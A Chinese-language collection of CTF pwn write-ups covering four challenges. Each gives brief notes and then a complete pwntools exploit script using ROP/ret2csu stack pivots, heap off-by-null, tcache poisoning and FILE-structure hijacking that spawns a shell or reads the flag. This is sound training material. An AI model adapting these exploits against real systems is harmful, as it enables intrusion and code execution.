11月比赛合集


鹏城杯

甲级战犯第一场

silent

思路:不需要泄露 libc。binary 里有一个 magic gadget `add dword ptr [rbp-0x3d], ebx`,用它把 0x601020 处保存的 `stdout` 指针(指向 libc 的 `_IO_2_1_stdout_`)按 32 位差值原地改写成 `open` / `write` 的地址,再配合 ret2csu 设置三个参数并通过该指针调用,最后栈迁移到 bss 上执行 open/read/write 读出 flag。

from pwn import *
import sys


# Debug-level logging echoes every byte sent and received.  Useful while
# developing the chain, very noisy (and slow) against the remote service.
context.log_level = 'debug'
context.arch = 'amd64'

libc = ELF('./libc.so.6')
elf = ELF('./silent')

# Non-zero: attack the remote instance; zero: spawn the binary locally.
flag = 1
p = remote('172.10.0.8', 9999) if flag else process("silent")

# Thin aliases over the tube API, used by the rest of the script.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
leak = lambda name, addr: log.success(name + "--->" + hex(addr))

# Addresses inside the (non-PIE) target.  The two csu gadgets are assumed to be
# the usual halves of __libc_csu_init: the "front" part moves r13/r14/r15 into
# the argument registers and calls [r12 + rbx*8], the "behind" part is the
# pop rbx/rbp/r12-r15; ret tail -- confirm both in the disassembly.
ret2csu_front = 0x400940
ret2csu_behind = 0x40095A
magic_gadget = 0x4007e8     # add dword ptr [rbp - 0x3d], ebx ; nop ... ; ret
stdout_got = 0x601020       # qword the script treats as holding &_IO_2_1_stdout_
bss = 0x602000              # writable scratch area for the second stage / pivot

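#0x00000000004007e8 : add dword ptr [rbp - 0x3d], ebx ; nop dword ptr [rax + rax] ; ret
def set_offset(target, raw):
    """Return the value ebx must hold so that the ``add dword`` gadget turns
    the dword currently equal to ``raw`` into ``target``.

    The gadget performs a 32-bit add, so the delta is reduced modulo 2**32.
    (The previous form only fixed up a negative delta by adding 2**32 once,
    which is wrong for any |delta| >= 2**32.)

    Caveat for reuse: only the low dword of the 8-byte pointer is modified,
    so the patch is exact only when ``target`` and ``raw`` share the same
    upper 32 bits.  For two symbols inside one libc mapping this holds
    unless ASLR happens to place a 4 GiB boundary between them; if it does,
    the exploit simply needs to be rerun.

    Args:
        target: address (or offset) the dword should end up holding.
        raw: address (or offset) the dword currently holds.

    Returns:
        ``(target - raw) mod 2**32`` as a non-negative int.
    """
    return (target - raw) & 0xffffffff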

def set_vuln(offset, target):
    """Build the ROP fragment that adds ``offset`` to the dword at ``target``.

    The csu tail (pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret --
    consistent with the six values consumed here) loads rbx = offset and
    rbp = target + 0x3d, then the chain returns into the
    ``add dword ptr [rbp - 0x3d], ebx`` gadget so the write lands exactly on
    ``target``.  Only the low 32 bits of the qword at ``target`` change.

    Args:
        offset: 32-bit addend, normally produced by set_offset().
        target: address of the dword to patch.

    Returns:
        bytes -- eight little-endian qwords.
    """
    regs = [
        ret2csu_behind,   # pop rbx; pop rbp; pop r12; pop r13; pop r14; pop r15; ret
        offset,           # rbx  (ebx is the addend)
        target + 0x3d,    # rbp, pre-biased so [rbp - 0x3d] == target
        0, 0, 0, 0,       # r12..r15, unused
        magic_gadget,     # add dword ptr [rbp - 0x3d], ebx ; ret
    ]
    return b''.join(p64(r) for r in regs)


def ret2csu(rdi, rsi, rdx, vuln):
    """Build a ROP fragment that calls ``*vuln``(rdi, rsi, rdx) via __libc_csu_init.

    The tail gadget pops rbx = 0, rbp = 1, r12 = vuln, r13 = rdi, r14 = rsi,
    r15 = rdx; the head gadget then moves r13/r14/r15 into the argument
    registers and executes ``call [r12 + rbx*8]``.  ``vuln`` is therefore the
    address of a *pointer* to the function (a GOT slot), not the function.
    rbx + 1 == rbp makes the loop exit after one call; the seven trailing
    qwords absorb the ``add rsp, 8`` and six pops that follow.

    NOTE(review): the r13->rdi / r14->rsi / r15->rdx mapping is the newer csu
    layout and rdi is loaded via ``mov edi, r13d``, so rdi values must fit in
    32 bits (fine for this non-PIE binary's addresses) -- confirm against the
    disassembly before reusing on another target.

    Args:
        rdi, rsi, rdx: integer arguments for the call.
        vuln: address of the pointer to call through.

    Returns:
        bytes -- fifteen little-endian qwords.
    """
    chain = [ret2csu_behind, 0, 1, vuln, rdi, rsi, rdx, ret2csu_front]
    chain += [0] * 7
    return b''.join(p64(v) for v in chain)

# ---- stage 1: overflow the stack buffer and read a second stage into .bss ----
# 0x48 bytes of filler reach the saved return address; the csu chain calls
# read(0, bss, 0x300) and then returns to 0x400878 (presumably the vulnerable
# function again so the stack can be overflowed a second time -- confirm).
stage1 = b''.join([
    b'a' * 0x48,
    ret2csu(0, bss, 0x300, elf.got['read']),
    p64(0x400878),
])
sd(stage1.ljust(0x100, b'\x00'))

# ---- stage 2: data landing at bss -- "./flag" string, then a ROP chain ----
# No libc leak is needed: the qword at stdout_got (treated as &_IO_2_1_stdout_)
# is patched in place with 32-bit adds so that it points at open() and later
# write(), and the csu gadget calls through that slot.  The flag read is
# capped at 0x40 bytes and fd 3 is assumed to be the first free descriptor.
stage2 = b''.join([
    b'./flag\x00\x00',                                                               # bss+0: path for open()
    set_vuln(set_offset(libc.sym['open'], libc.sym['_IO_2_1_stdout_']), stdout_got),  # slot := &open
    ret2csu(bss, 0, 0, stdout_got),                                                   # open("./flag", O_RDONLY)
    ret2csu(3, bss + 0x500, 0x40, elf.got['read']),                                   # read(3, bss+0x500, 0x40)
    set_vuln(set_offset(libc.sym['write'], libc.sym['open']), stdout_got),            # slot := &write
    ret2csu(1, bss + 0x500, 0x40, stdout_got),                                        # write(1, bss+0x500, 0x40)
]).ljust(0x300, b'\x00')
sd(stage2)

# ---- stage 3: pivot the stack onto the chain at bss+8 ----
# 0x40 bytes of filler, saved rbp = bss, return address = 0x400876 (presumably
# a leave; ret -- confirm), so rsp becomes bss + 8, right after "./flag".
stage3 = b'a' * 0x40 + p64(bss) + p64(0x400876)
sd(stage3.ljust(0x100, b'\x00'))
p.interactive()

auto coffee

赛后才发现可以直接覆写第二个指针组(对应下面 exp 中 `edit(3,2,...)` 那一步),比赛时没看出来,绕了不少弯路。

from pwn import *
import sys


# Debug-level logging echoes all traffic; handy locally, noisy on remote.
context.log_level = 'debug'
context.arch = 'amd64'

libc = ELF('./libc-2.31.so')

# Non-zero: attack the remote instance; zero: run the binary locally.
flag = 0
p = remote('43.132.193.22', 9998) if flag else process("./coffee")

# Thin aliases over the tube API used throughout the script.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
leak = lambda name, addr: log.success(name + "--->" + hex(addr))

def login():
    """Answer the login prompt with the two values the challenge accepts.

    ``4421`` is sent at the ``>>>`` prompt and ``just pwn it`` straight
    after (presumably a code and a name -- see the challenge's prompt).
    """
    p.sendlineafter(b'>>>', b'4421')
    p.sendline(b'just pwn it')

def out():
    """Select menu option 3 (leave the current sub-menu / log out)."""
    p.sendlineafter(b'>>>', b'3')

def buy1(choice):
    """Menu option 1: buy item ``choice`` and decline the extra input (N)."""
    p.sendlineafter(b'>>>', b'1')
    p.sendlineafter(b'buy\n', str(choice).encode())
    p.sendlineafter(b'N\n', b'N')

def buy2(choice, content):
    """Menu option 1: buy item ``choice``, accept the extra input (Y) and
    send ``content`` raw (no newline appended) as that input."""
    p.sendlineafter(b'>>>', b'1')
    p.sendlineafter(b'buy\n', str(choice).encode())
    p.sendlineafter(b'N\n', b'Y')
    p.sendafter(b'\n', content)

def re_coffee(choice):
    """Option 1 of the logged-in menu, applied to item ``choice``."""
    p.sendlineafter(b'>>>', b'1')
    p.sendlineafter(b'>>>', str(choice).encode())

def edit(choice, idx, content):
    """Option 2 of the logged-in menu: write ``content`` (raw, no newline)
    into field ``idx`` of item ``choice``."""
    p.sendlineafter(b'>>>', b'2')
    p.sendlineafter(b'>>>', str(choice).encode())
    p.sendlineafter(b'>>>', str(idx).encode())
    p.sendafter(b'\n', content)

# Phase 1: six buy / login / edit / out rounds alternating between item 1 and
# item 2, each zeroing field 1 of the item just bought.  What these writes hit
# is not visible from the script; the resulting layout is what is abused below.
for choice in (1, 2, 1, 2, 1, 2):
    buy1(choice)
    login()
    edit(choice, 1, p64(0))
    out()

# Seventh round: plant 0x4063c0 (a writable address in the non-PIE binary,
# presumably a pointer slot -- confirm in the disassembly) into item 1.
buy1(1)
login()
edit(1, 1, p64(0x4063c0))
out()

# Seven item-3 purchases without logging in, then log in, "re_coffee" item 3
# twice and overwrite its second pointer group with three binary addresses;
# the last one (0x406018) is used below as read@GOT.
for _ in range(7):
    buy1(3)

login()
re_coffee(3)
re_coffee(3)
edit(3, 2, p64(0x406300) + p64(0x4062f0) + p64(0x406018))

# Point item 1's second group at 0x406000, then enter the edit menu (option 2):
# it lists the current entries and entry "3." spills the qword at 0x406018,
# which must be read@GOT since read's symbol offset is subtracted from it.
edit(1, 2, p64(0x406000))
sla(b'>>>', b'2')
ru(b'3.')
libc.address = u64(ru(b'\x7f')[-6:].ljust(8, b'\x00')) - libc.sym['read']
leak("libc.address", libc.address)

# Finish the pending edit (item 1, field 3) with system's address -- i.e. the
# slot just leaked is overwritten -- then buy item 1 with "/bin/sh" as the
# extra input so the hijacked function is presumably invoked on that buffer.
sla(b'>>>', b'1')
sla(b'>>>', b'3')
sa(b'\n', p64(libc.sym['system']))
out()

buy2(1, b'/bin/sh\x00')

p.interactive()

babyheap

glibc 2.38 下的 off-by-null。思路:用 off-by-null 清掉相邻 chunk 的 PREV_INUSE 并伪造 prev_size,释放时触发向后合并得到重叠 chunk,再做 tcache 投毒劫持 `_IO_list_all`,伪造 FILE 走 `_IO_wfile_jumps` 链在退出时调 `system`。比赛时在 unlink 上纠结了太久,其实并不需要走传统的 unlink 任意写。

from pwn import *
import sys

# Debug-level logging echoes all traffic; handy locally, noisy on remote.
context.log_level = 'debug'
context.arch = 'amd64'

libc = ELF('./libc.so.6')

# Non-zero: attack the remote instance; zero: run the binary locally.
flag = 0
p = remote('43.132.193.22', 9998) if flag else process("babyheap")

# Thin aliases over the tube API used throughout the script.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
leak = lambda name, addr: log.success(name + "--->" + hex(addr))

# Exact prompt the program prints before reading a menu choice.
menu = b'>> \n'

def add(size, content):
    """Menu 1: allocate ``size`` bytes and fill them with ``content``.

    ``content`` is sent raw (no newline appended); callers add their own
    terminator where the program expects one.
    """
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b'\n', str(size).encode())
    p.sendafter(b'\n', content)

def edit(index, size, content):
    """Menu 2: write ``content`` (raw) into chunk ``index`` with a caller
    supplied ``size``.  The off-by-null the exploit relies on lives in the
    program's handling of this write."""
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b'\n', str(index).encode())
    p.sendlineafter(b'\n', str(size).encode())
    p.sendafter(b'\n', content)

def show(index):
    """Menu 3: print the contents of chunk ``index``."""
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b'\n', str(index).encode())

def delete(index):
    """Menu 4: free chunk ``index``."""
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b'\n', str(index).encode())

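# The program prints a heap pointer at start-up; 0x2a0 past heap base is the
# first user chunk (right behind the 0x290-byte tcache_perthread_struct).
ru(b'0x')
heap = int(rc(12), 16) - 0x2a0
leak("heap_base", heap)

# Three chunks: #0 and #1 of chunk size 0x500, #2 of 0x410 (0x408 request).
add(0x4f8, b"\n")
add(0x4f8, b"\n")
add(0x408, b"\n")

# Off-by-null setup.  Writing exactly 0x4f8 bytes into #0 puts p64(0x500) at
# #0+0x4f0, i.e. #1's prev_size, and (assuming edit appends a NUL) the extra
# byte at #0+0x4f8 clears the low byte of #1's size -> PREV_INUSE is gone.
# The pointer pairs written into #0 and #1 are what the 2.38 consolidation
# path checks on free; their exact layout is build-specific -- verify in gdb
# before reusing.
edit(0, 0x4f8, p64(heap + 0x7b0) + p64(heap + 0x7b0) + b"\x00" * 0x4e0 + p64(0x500))
edit(1, 0x10, p64(heap + 0x2b0) + p64(heap + 0x2b0))

# Free #1: it consolidates backward over #0 while index 0 still points inside
# the merged region (overlapping chunks).
delete(1)

# Carve a 0x410 chunk out of the merged region (index 1 now aliases #0's
# memory), then free #2 and #0 into the 0x410 tcache bin.
add(0x408, b'\n')  # 1
delete(2)
delete(0)

# Tcache poisoning (safe-linking: next = target ^ (chunk_addr >> 12)): redirect
# the bin head's next to heap+0xae0, drain the bin, then two more 0x410
# allocations come from the remaining free region so that show(2) prints a
# main_arena pointer.
edit(1, 0x8, p64((heap >> 12) ^ (heap + 0xae0)))
add(0x408, b"\n")
add(0x408, b"\n")

add(0x408, b"\n")
add(0x408, b"\n")
show(2)

# 0x1feed0 is the distance from the leaked arena pointer to libc base for
# this particular libc build; recompute if the target libc changes.
libc.address = u64(ru(b'\x7f')[-6:].ljust(8, b'\x00')) - 0x1feed0
leak("libc", libc.address)

# Second poisoning: refill the 0x410 bin and redirect it to _IO_list_all.
delete(4)
delete(0)
edit(1, 0x8, p64((libc.sym['_IO_list_all'] ^ (heap >> 12))))

# Fake FILE driven through _IO_wfile_jumps with a fake _wide_data and
# _wide_vtable (House-of-Apple-2 style): when the FILE is flushed the wide
# vtable call reaches system() with rdi = the FILE itself, whose first bytes
# read " sh;" -- the flags field doubles as the command string.
# FILE offsets used: 0x88 _lock (a quiet heap address), 0xa0 _wide_data,
# 0xd8 vtable; _wide_data+0xe0 is _wide_vtable and _wide_vtable+0x68 is the
# __doallocate slot that receives system.
# NOTE(review): the leading string is 7 bytes long, so p64(1) starts at
# offset 0x27 rather than 0x28 (_IO_write_ptr); the exploit worked for the
# author, but confirm the field alignment in gdb before relying on it.
fake_io_addr = heap + 0x2c0
fake_IO_struct = b' sh;\x00\x00\x00'  # rdi for system()
fake_IO_struct += p64(0) * 0x4
fake_IO_struct += p64(1)
fake_IO_struct = fake_IO_struct.ljust(0x88, b'\x00') + p64(heap + 0x800)
fake_IO_struct = fake_IO_struct.ljust(0xa0, b'\x00')
fake_IO_struct += p64(fake_io_addr + 0x200)  # fake _wide_data
fake_IO_struct = fake_IO_struct.ljust(0xd8, b'\x00')
fake_IO_struct += p64(libc.sym['_IO_wfile_jumps'])
fake_IO_struct = fake_IO_struct.ljust(0x200, b'\x00')
fake_IO_struct += b'\x00' * 0xe0
fake_IO_struct += p64(fake_io_addr + 0x200 + 0xe0)  # _wide_data->_wide_vtable
fake_IO_struct += b'\x00' * 0x60 + p64(libc.sym['system'])  # __doallocate -> system (or setcontext)

# First allocation comes from the heap and carries the fake FILE (expected to
# sit at fake_io_addr -- verify in gdb); the second is served from
# _IO_list_all and overwrites its low 6 bytes with the fake FILE's address.
add(0x408, fake_IO_struct + b'\n')
add(0x408, p64(heap + 0x2c0)[0:6] + b'\n')

# Attach a debugger only for local runs: gdb.attach() against a remote tube
# fails (or blocks waiting for a terminal) and would break the final step.
if not flag:
    gdb.attach(p)

# Option 5 is presumably exit; exit() flushes every FILE on _IO_list_all,
# which walks into the fake vtable chain above.
sla(menu, b'5')

p.interactive()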

强网拟态

甲级战犯第二场

noob_heap

这题的堆风水(堆布局)非常繁琐,做得人头疼。

off-by-null 和 malloc_consolidate 这两个利用点一眼就能看出来,但堆风水做了四个小时也没做出来,最后只能放弃。

后来看了星盟的 exp 才恍然大悟:关键应该是在 fastbin 里放好 chunk 后,用一行超长输入(exp 中的 `sla(menu, b'1'*0x400)`)让程序申请一个大块,从而触发 malloc_consolidate 把相邻的 fastbin chunk 合并,配合 off-by-null 伪造的空闲 chunk 得到重叠。说到底还是对 malloc_consolidate 不够熟悉。

from pwn import *
import sys


# Debug-level logging echoes all traffic; handy locally, noisy on remote.
context.log_level = 'debug'
context.arch = 'amd64'

libc = ELF('./libc.so.6')

# Non-zero: attack the remote instance; zero: run the binary locally.
flag = 0
p = remote('43.132.193.22', 9998) if flag else process("./noob_heap")

# Thin aliases over the tube API used throughout the script.
sa = lambda s, n: p.sendafter(s, n)
sla = lambda s, n: p.sendlineafter(s, n)
sl = lambda s: p.sendline(s)
sd = lambda s: p.send(s)
rc = lambda n: p.recv(n)
ru = lambda s: p.recvuntil(s)
ti = lambda: p.interactive()
leak = lambda name, addr: log.success(name + "--->" + hex(addr))

# Exact prompt the program prints before reading a menu choice.
menu = b'>> '
def add(size):
    """Menu 1: allocate a chunk of ``size`` bytes (no content is written)."""
    p.sendlineafter(menu, b'1')
    p.sendlineafter(b': ', str(size).encode())

def edit(index, content):
    """Menu 3: write ``content`` (raw, no newline) into chunk ``index``.

    The program's write is the off-by-null primitive used by the exploit.
    """
    p.sendlineafter(menu, b'3')
    p.sendlineafter(b': ', str(index).encode())
    p.sendafter(b': ', content)

def delete(index):
    """Menu 2: free chunk ``index``."""
    p.sendlineafter(menu, b'2')
    p.sendlineafter(b': ', str(index).encode())

def show(index):
    """Menu 4: print the contents of chunk ``index``."""
    p.sendlineafter(menu, b'4')
    p.sendlineafter(b': ', str(index).encode())

# --- heap leak ---------------------------------------------------------------
# Allocate, free and re-allocate one 0x80 chunk.  In an otherwise empty tcache
# bin the entry's `next` is (heap >> 12) ^ 0 (safe-linking, glibc >= 2.32) and
# tcache_get leaves it in place, so show(0) prints it.  The last five bytes of
# the printed line are that value; shifting back by 12 yields the heap base.
add(0x78)
delete(0)
add(0x78)
show(0)
heap_base = u64(p.recvuntil(b'\n',drop=True)[-5:].ljust(8,b'\x00')) << 12
leak("heap_base",heap_base)

# --- libc leak via malloc_consolidate -----------------------------------------
# 24 more 0x80 chunks, laid out back to back (indices 1-24).
for i in range(6):
    add(0x78) #1-6

for i in range(18):
    add(0x78) #7-24

# Free 0-6 to fill the 0x80 tcache bin (7 entries) ...
for i in range(7):
    delete(i)

# ... so that 7-15 go to the fastbin (0x80 is the largest default fastbin size).
for i in range(9):
    delete(i+7)
# An oversized line at the menu prompt makes the program request a large
# buffer (presumably through stdio); a large malloc with non-empty fastbins
# runs malloc_consolidate, merging the nine adjacent fastbin chunks into one
# unsorted chunk.
sla(menu,b'1'*0x400)

# Drain the tcache (indices 0-6); the next allocation is then split off the
# unsorted chunk and still carries the arena fd/bk pointers, which show(7)
# prints.
for i in range(7):
    add(0x78) #0-6

add(0x78) #7
show(7)
# 0x21a0f0 is the distance from the leaked arena pointer to libc base for this
# libc build; recompute it if the target libc changes.
libc.address = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00')) - 0x21a0f0
leak("libc",libc.address)

# --- feng shui: build overlapping chunks --------------------------------------
# Indices 8-13 are carved out of the rest of the consolidated chunk.
for i in range(6):
    add(0x78)

# Refill the tcache bin so the next frees land in the fastbin again.
for i in range(7):
    delete(i)

# Fake "free" chunk 13.  With 0x80 chunks laid out consecutively after the
# 0x290-byte tcache struct, heap_base+0x910 == 0x290 + 13*0x80 is chunk 13's
# own header, so fd == bk == self satisfies unlink_chunk's
# fd->bk == p && bk->fd == p.  p64(0x80) at offset 0x70 lands in the next
# chunk's prev_size, and the NUL the program appends (the off-by-null) clears
# that chunk's PREV_INUSE bit -- chunk 13 now looks free although index 13
# still owns it.
edit(13,p64(heap_base+0x910)*2 + b'\x00'*0x60 + p64(0x80))
# Free 12 and 11 into the fastbin and consolidate again: chunk 12 merges
# forward over the fake-free chunk 13, producing an unsorted chunk that
# overlaps index 13.
delete(12)
delete(11)
sla(menu,b'1'*0x400)


# Same trick three chunks lower: heap_base+0x790 == 0x290 + 10*0x80 is
# chunk 10's header; freeing 9 and consolidating merges 9 over 10.
edit(10, p64((heap_base + 0x790))*2 + b'\x00'*0x60 + p64(0x80))
delete(9)
sla(menu,b'1'*0x400)

# Drain the tcache once more and carve four chunks out of the merged regions,
# so live indices alias memory that is about to be freed/re-allocated (the
# exact aliasing was established in gdb; the tcache edits below depend on it).
for i in range(7):
    add(0x78)

add(0x78)
add(0x78)
add(0x78)
add(0x78)

# --- stack leak through stdout ------------------------------------------------
for i in range(4):
    delete(i)

# Tcache poisoning: index 14 overlaps a chunk now in the 0x80 tcache bin; its
# `next` is rewritten to _IO_2_1_stdout_ (safe-link encoded with
# heap_base >> 12; only 6 bytes so the appended NUL does not clobber more).
delete(10)
edit(14,p64(libc.sym['_IO_2_1_stdout_']^(heap_base>>12))[0:6])
add(0x78)
add(0x78)
# Index 1 is now _IO_2_1_stdout_: _flags = 0xfbad1800, _IO_read_ptr/end/base
# = 0, _IO_write_base = &_environ, _IO_write_ptr = &_environ + 8 -> the next
# stdout flush writes the 8 bytes at _environ, i.e. a stack pointer.
edit(1,p64(0xfbad1800) + p64(0)*3 + p64(libc.sym['_environ']) + p64(libc.sym['_environ']+8))

stack = u64(ru(b'\x7f')[-6:].ljust(8,b'\x00'))
# Frame-specific distance from environ to the targeted stack slot.  It must be
# 16-byte aligned, otherwise tcache rejects the poisoned pointer below.
ret_addr = stack - 0x138 - 0x60

# Second poisoning, this time towards the stack slot.
delete(0)

edit(14,p64(ret_addr^(heap_base>>12))[0:6])

leak("stack",stack)
add(0x78)
add(0x78)

# --- ORW ROP chain -------------------------------------------------------------
# Gadget offsets are specific to this libc build.
pop_rdi = 0x000000000002a3e5 + libc.address
pop_rsi = 0x0000000000160498 + libc.address
pop_rdx = 0x00000000000796a2 + libc.address
lea_ret = 0x000000000004da83 + libc.address  # presumably `leave ; ret`, used to pivot below
# open("./flag", O_RDONLY) -- the path string is placed at ret_addr below --
# then read(3, heap+0x300, 0x40) and write(1, heap+0x300, 0x40).  Assumes the
# flag file receives fd 3 and fits in 0x40 bytes.
orw = flat([
    pop_rdi,ret_addr,
    pop_rsi,0,
    libc.sym['open'],
    pop_rdi,3,
    pop_rsi,heap_base+0x300,
    pop_rdx,0x40,
    libc.sym['read'],
    pop_rdi,1,
    libc.sym['write'],
])
# Index 0's chunk holds the chain on the heap (expected at heap_base+0x7a0).
edit(0,orw)

# Index 2 is the stack chunk: "./flag" at ret_addr, then the frame is rewritten
# so the function returns into lea_ret with rbp pre-set to heap_base+0x7a0-8,
# pivoting rsp onto the ORW chain.  Offsets are frame specific -- verify in gdb.
edit(2,b'./flag\x00\x00' + p64(0)*6 + p64(lea_ret) + p64(0)*4 + p64(heap_base+0x7a0-8) + p64(lea_ret))

p.interactive()
